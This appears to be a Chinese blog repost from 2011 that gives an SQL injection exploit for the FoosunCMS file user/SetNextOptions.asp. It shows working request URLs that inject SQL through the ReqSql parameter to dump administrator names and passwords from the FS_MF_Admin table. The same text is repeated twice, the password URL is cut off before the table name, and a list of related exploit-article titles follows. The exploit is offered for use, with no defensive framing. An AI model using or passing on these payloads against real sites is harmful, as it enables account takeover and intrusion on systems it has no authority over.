风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
2011-05-28 21:31
1121 查看
转自黑面
风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。
漏洞文件:
http://www.heimian.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:
http://www.heimian.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码:
http://www.heimian.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from
风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。
漏洞文件:
http://www.heimian.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:
http://www.heimian.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码:
http://www.heimian.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from
相关文章推荐
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
- SQL通用防注入系统asp版 插一句话漏洞利用
- ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本
- SQL注入天书—ASP注入漏洞全接触
- SQL注入天书—ASP注入漏洞全接触
- SQL注入天书—ASP注入漏洞全接触
- ECSHOP 搜索注入漏洞利用exp及后台拿shell
- SQL注入天书—ASP注入漏洞全接触
- 第四章:iOS应用漏洞利用 ——4.25 代码注入和DYLD_INSERT_LIBRARIES
- SQL注入天书—ASP注入漏洞全接触
- SQL注入天书之ASP注入漏洞全接触
- ASP防注入漏洞方法
- “织梦”CMS注入高危漏洞情况
- ASP.net 资源请求漏洞利用工具PadBuster
- 利用joomla 3.2.0 – 3.4.4 注入漏洞到getshell
- SQL注入天书—ASP注入漏洞全接触
- (转载)ASP网站如何防止注入漏洞攻击
- 防网站漏洞扫描asp代码,也就是防注入的通用代码